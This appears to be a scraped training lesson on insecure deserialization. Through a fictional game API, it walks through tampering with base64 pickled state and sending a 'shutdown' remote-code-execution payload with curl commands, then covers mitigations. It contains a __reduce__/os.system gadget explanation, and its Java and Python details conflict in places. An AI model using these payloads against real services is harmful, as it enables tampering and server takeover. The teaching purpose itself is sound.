Insecure deserialization
Improper handling of serialized data containing user input
~20mins estimatedSelect your ecosystem
What is insecure deserialization?
Serialization is a mechanism to transform application data into a format suitable for transport â a byte stream. Deserialization is the opposite process, converting byte stream into application data. Insecure deserialization is a vulnerability that occurs when attacker-controlled data is deserialized by the server. In the worst case, it can lead to remote code execution.
About this lesson
In this lesson, we will demonstrate an insecure deserialization attack by hacking an API of a video game company. Then, we will dive deeper into Java deserialization, explain the concept of a gadget, and study vulnerable Java code. Finally, we will cover how to mitigate this vulnerability.
But first, letâs hack a video game!
Hacking a web game
"Dungeons and Money" is here! Your long-time favorite game developer, GreedAndCo, has finally finished the multiplayer online game you have been waiting for since childhood. Itâs 11:59pm, and you have been furiously restarting the game, hoping for the login screen to appear.
The clock strikes midnight. With excitement at its peak, you press the login button and finally start playing. But something is not rightâeven a level 1 rabbit is life-threatening. The game relies on microtransactions! You have to pay $10.99 for an epic sword if you want to kill rabbits. You canât believe thisâyouâve already paid big money for the game. Oh well, itâs time to put your hackerâs hat on and fix this injustice!
Wow, this sword really is tiny. But Iâm not paying to upgrade. Letâs take a look at the terminal below and see if we can make some modifications.
Understanding the API
You start by sniffing the network traffic the game sends from your machine while you play. A few minutes later, you notice that the game client does an HTTP POST to https://api.dungeonsandmoney.com/state/147983414 with the following payload:
{ "equipment": "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4=", "location": "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LC", âŠ}Maybe these long strings are base64 encoded? Letâs take the equipment value and verify that! Run:
echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl
Deserializing Python objects
The output might look complex, but it was just a base64 encoded representation of a serialized Python object. To understand its contents, we need to first decode the base64 string and then deserialize it. We would decode the base64 string to a file called equip.pkl by running:
echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl
Deserializing Python objects to a human-readable format
We will be deserializing objects into a human-readable format using the following script:
Changing the game state
Excellent! The serialized object represents the Equipment class. Upon closer inspection, you'll see it possesses an items field. The values of the items array are [0, 0, 1, 0, 0].
Your in-game character currently has only 1 item equipped: a level 1 sword. What do you think will happen if we change the value of the array to [0, 0, 20, 0, 0] (change 1 to 20)? Our aim is to elevate our character's capabilities by amplifying the sword's level. To achieve this, we'll be altering the value 1 (representing the level 1 sword) in the items array to 20 (indicating a level 20 sword).
Here's how the interactive component should work:
- Modify the items array from
[0, 0, 1, 0, 0]to[0, 0, 20, 0, 0]within the deserialized Python object. - Serialize the modified Python object.
- Convert the serialized data to a base64 encoded string for transmission or storage.
We will serialize and base64 encode the Python object to prepare it for sending to the game API using the following script:
After serializing and base64 encoding we get the following output:
gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu
Now we can attach this payload to the API POST request.
curl -H "Content-Type: application/json" -X POST -d '{ "equipment":"gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu" }' https://api.dungeonsandmoney.com/state/147983414
Remote code execution
You log into the game, and boom! Your level 1 sword just got upgraded to level 20. By manipulating serialized data, you managed to change the state of the game.
Now things are looking better! We can take on almost any enemy that comes our way. But can we take this one step further?
Observe the following code:
Explanation:
- EvilClass is defined with a special method
__reduce__ __reduce__returns a tuple to run os.system with a specific command- An instance of EvilClass is created as
evil_instance evil_instanceis serialized usingpickle.dumps()- Deserializing
evil_payloadusingpickle.loads()executes the malicious command
You prepare the code below to generate a serialized, base64 encoded payload that will run the "shutdown" command when executed:
We should get:
rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=
Now when we run the following, our game will change again:
curl -H "Content-Type: application/json" -X POST -d '{ "equipment": "rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=" }' https://api.dungeonsandmoney.com/state/147983414
Boom! Your game client crashes, and a gigantic red âServer is downâ alert pops up on your screen. The shutdown command must have worked! But how?
State manipulation: a false sense of security
We saw how insecure deserialization can lead to state manipulation and remote code execution in the previous section. State manipulation can happen regardless of serialization being used or not. However, because serialized payloads are more âobscureâ, developers tend to assume that serialization somehow protects them against this kind of attack. In reality, it doesnât matter if payloads are human-readable JSON or obscure binary blobs â if the client can unexpectedly manipulate the state, the whole API needs to be redesigned.
But the truth is far from it. Whether a payload is a seemingly cryptic Base64 encoded string or a straightforward JSON object, if a malicious actor can influence its contents, the integrity of the application is at risk. Rather than relying on obscurity, it's paramount to ensure that any data - serialized or not - coming from untrusted sources is meticulously validated and sanitized. When a system is vulnerable to state manipulation from client-side data, it's a clear sign that there's a pressing need for a more secure design approach.
Remote code execution
In the worst case, deserialization vulnerabilities can lead to remote code execution. Letâs look at the EvilGadget class we used in the previous exercise.
Explanation
The __reduce__ method is used for defining custom behavior during pickling. The method returns a tuple where the first item is a callable (in this case, os.system) and the subsequent items are arguments for that callable.
When an instance of EvilPickleObject is deserialized using pickle.loads(), it will call the callable with the specified arguments, executing the malicious command.
Other serialization frameworks
Pickle
As already discussed, Python's built-in pickle module is well-known for its insecure deserialization vulnerabilities. It allows serialization and deserialization of arbitrary Python objects, leading to the potential for arbitrary code execution if a malicious payload is processed.
PyYAML
The PyYAML library is used to parse YAML documents into Python objects. In older versions of the library, the yaml.load() method was vulnerable to arbitrary code execution through crafted YAML payloads. Using the yaml.safe_load() method instead is recommended as it limits deserialization to basic Python objects.
JSON Libraries
JSON libraries in Python are generally safe from deserialization attacks because JSON does not support complex types and functions. Instead, it deals with simple data structures. However, always validate the structure of the incoming data to prevent potential issues related to unexpected data types or structures.
Don't deserialize untrusted data
The golden rule for avoiding insecure deserialization issues is to never deserialize data that originates from an untrusted source, such as user input.
Opt for simpler data structures
Serialization of complex data structures from untrusted sources is inherently unsafe as it can result in arbitrary code execution. Whenever possible, opt for simpler serialization formats like JSON which does not support deserializing into arbitrary objects with complex types and functions.
Use safer function alternatives
In PyYAML, the default yaml.load() can create any Python object, which poses security risks. Using yaml.safe_load() only allows simple Python data structures like lists or dictionaries.
Test your knowledge!
Keep learning
To learn more about Insecure Deserialization, check out some other great content:
- The original research on deserialization vulnerabilities by Gabriel Lawrence and Chris Frohoff
- A great blog post on how to exploit insecure deserialization in different Java server-side technologies by Stephen Breen
- A blog post by the maintainer of Jackson which details exploitability conditions for insecure deserialization in Jackson
- A detailed analysis of insecure deserialization in different Java serialization libraries by Moritz Bechler
- Security implications of Pickle module
- A blog post about insecure deserialization attack in Python application
- Another post about insecure deserialization in Python
And some content by Snyk:
- Our blog post on new serialization features introduced in Java 17
- Our earlier blog post which covers a lot of topics covered in this lesson
- Our blog post on deserialization problems with Jacksonâs ObjectMapper